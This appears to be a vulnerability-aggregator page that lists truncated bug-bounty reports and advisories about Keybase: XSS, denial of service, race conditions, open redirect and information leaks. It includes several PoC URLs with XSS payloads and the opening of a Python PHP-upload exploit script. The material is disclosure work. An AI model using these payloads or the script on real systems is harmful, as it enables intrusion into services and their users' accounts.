
Hacker One
added 2017/07/02 9:42 a.m., 24 views

Keybase: Persistent XSS on keybase.io via "payload" field in `/user/sigchain_signature.toffee` template

Issue: Keybase allows you to see other users' sigchains by navigating to /sigchain. The "Payload" field containing JSON related to the chainlink on the right side of the page is not correctly escaped during templating, leading to a persistent XSS as users have a high degree of control over the...

AI score: 6
Exploits: 0
Veracode
added 2017/06/22 3:13 a.m., 12 views

Downgrade Attack

github.com/keybase/client is vulnerable to downgrade attack. This attack is possible because the library does not validate the version signature prefixes...

AI score: 6.7
Exploits: 0
Hacker One
added 2017/05/27 12:50 p.m., 13 views

Keybase: Universal Cross-Site Scripting in Keybase Chrome extension

Description: The Keybase Chrome extension makes heavy use of the insecure innerHTML DOM API, resulting in Universal Cross-Site Scripting on all Keybase-supported social networking websites. Steps to reproduce the issue: 1. Install the Keybase Chrome extension 2. Navigate to the following URL addres...

AI score: 6.2
Exploits: 0
hackapp
added 2017/05/26 2:41 p.m., 18 views

Keybase - Customized SSL, Dangerous filesystem permissions, Redefined SSL Common Names verifier vulnerabilities

The HackApp vulnerability scanner discovered that the Keybase application published on the 'play' market has multiple vulnerabilities...

AI score: 0.3
Exploits: 0, References: 1, Affected Software: 1
ThreatPost
added 2017/05/25 2:43 p.m., 10 views

Keybase Extension Brings End-to-End Encrypted Chat To Twitter, Reddit, GitHub

A recently released Chrome extension, developed by the public key crypto database Keybase, brought end-to-end encrypted messaging to several apps this week. Keybase, a service that allows users to identify themselves with a public encryption key, introduced its end-to-end encrypted chat feature...

AI score: 6.8
Exploits: 0, References: 20
pwnmalw
added 2017/01/14 12:00 a.m., 582 views

Malware exploit: Keybase

Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...

AI score: 1
Exploits: 0
Hacker One
added 2016/09/07 9:44 p.m., 21 views

Keybase: Denial of Service through set_preference.json

Hey there, when selecting an image at https://keybase.io//api/1.0/image/setpreference.json, passing an invalid value in identitysrc knocks the server down for 20-30 seconds, with just one request. I have verified this by visiting an external website that checks if a website is down. PoC: 1. Conne...

AI score: 0.2
Exploits: 0
Hacker One
added 2016/07/01 6:08 a.m., 20 views

Keybase: Register multiple users using one invitation (race condition)

Hi, it is possible to create multiple accounts using a single invitationid due to a race condition bug in //api/1.0/signup.json. I have successfully created 8 accounts using the invitation with id = 37c5a121adf23e90b875500d. The account usernames: novijosiptest1,2,4,5,6,8,9,10. You can delete them, I...

AI score: 1.2
Exploits: 0
Hacker One
added 2016/02/07 5:11 p.m., 16 views

Keybase: Content spoofing due to the improper behavior of the not-found message

Hey, at dist.keybase.io it's possible to inject text in the not-found message in order to trick the user into visiting a website or doing something an attacker might be interested in. PoC: https://goo.gl/3WO6iH I've shortened this one because it's really long; it needs to be on google...

AI score: 6.9
Exploits: 0
Hacker One
added 2016/02/06 1:41 a.m., 31 views

Keybase: Race conditions can be used to bypass invitation limit

Hi, I have received 3 invites from Chris (I might have screwed up the PGP email, but thanks anyway), added to my account https://keybase.io/josipfranjkovic. Using race conditions, I was able to send out a total of 7 invites to my throwaway emails, obviously bypassing the 3-invitation limit. Here a...

AI score: 0.2
Exploits: 0
Hacker One
added 2016/02/04 7:14 p.m., 18 views

Keybase: Remote Server Restart Leads to Denial of Service by only one Request.

https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5419 PoC: set a wrong uid; in this example I change the last number from 9 to 8: https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5418...

AI score: 0.7
Exploits: 0
Hacker One
added 2016/02/02 2:06 p.m., 22 views

Keybase: Remote Server Restart Leads to Denial of Service by only one Request.

URL: https://keybase.io//api/1.0/merkle/block.json?hash=68b5d3599be9acbe97bcc45603a322f85f8a99b9cbc696592fe1088c3a099a45d929f0bc2fae2230f0b31b5e4b4122365f50b34fcf91a94a357df90a83e3b013 PoC: https://keybase.io//api/1.0/merkle/block.json?hash=1 see video...

AI score: 1
Exploits: 0
Openbugbounty
added 2015/10/30 10:27 p.m., 8 views

keybase.io XSS vulnerability

Vulnerable URL: https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSSPOSED/...

AI score: 6.9
Exploits: 0
Hacker One
added 2015/10/30 7:35 p.m., 14 views

Keybase: Un-handled exception leads to Information Disclosure

Steps: 1. Log in to https://keybase.io/ 2. Click on the Me icon from the top-right button https://keybase.io/username 3. Click on the Edit picture button https://keybase.io/usernameedit-me 4. Intercept the traffic using a proxy tool, e.g. Burp Suite 5. Click on the "Prove my Twitter identity" link 6. In the request,...

AI score: 6.6
Exploits: 0
Hacker One
added 2015/10/08 10:26 a.m., 22 views

Keybase: XSS

This XSS issue only affects older content-sniffing browser versions that don't see the X-Content-Type-Options: nosniff header that you're sending. https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSS/ This returns a page that contains this information:...

AI score: 1.6
Exploits: 0
Hacker One
added 2015/09/02 1:26 p.m., 16 views

Keybase: [keybase.io] Open Redirect

PoC: https://keybase.io//www.google.com/%2f%2e%2e HTTP Response: HTTP/1.1 303 See Other ... Location: //www.google.com/%2f%2e%2e/...

Exploits: 0
Hacker One
added 2015/07/23 2:38 a.m., 13 views

Keybase: Sensitive server-side/application information disclosure

There is an information disclosure vulnerability present in the Keybase API request whenever an exception occurs. Steps to reproduce: Open the following URL in any browser - https://keybase.io//api/1.0/user/lookup.json?twitter=john&github=john&usernames=john&usernames=rock Observe that when we add...

AI score: 0.5
Exploits: 0
Hacker One
added 2015/07/21 1:27 p.m., 10 views

Keybase: Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json

When we send a POST request to https://keybase.io//api/1.0/invitationrequest.json with multiple fullname parameters, for example: [email protected]&fullname=1&fullname=2 we get an error response, which contains information about the server paths and code: TypeError: Object 1,2 has no method...

AI score: 0.9
Exploits: 0
Hacker One
added 2015/07/20 8:27 p.m., 32 views

Keybase: No rate limiting for sensitive actions (like "forgot password") enables user enumeration

Hi there, I noticed a small information leak which allows an attacker to check whether an email address is associated with an account. Steps to reproduce: Send a POST request to the URL POST //api/1.0/send-reset-pw.json HTTP/1.1 as the following example shows: POST //api/1.0/send-reset-pw.json...

AI score: 0.3
Exploits: 0
Hacker One
added 2015/07/20 8:08 p.m., 20 views

Keybase: SMTP protection not used

Hi, I'm checking your website and found an SPF record there. You should apply a strict SMTP policy to stop spoofed email sending from your domain. An attacker would send a fake email from [email protected] saying "Please change your password". The victim is aware of phishing attacks, but when he sees...

AI score: 6.9
Exploits: 0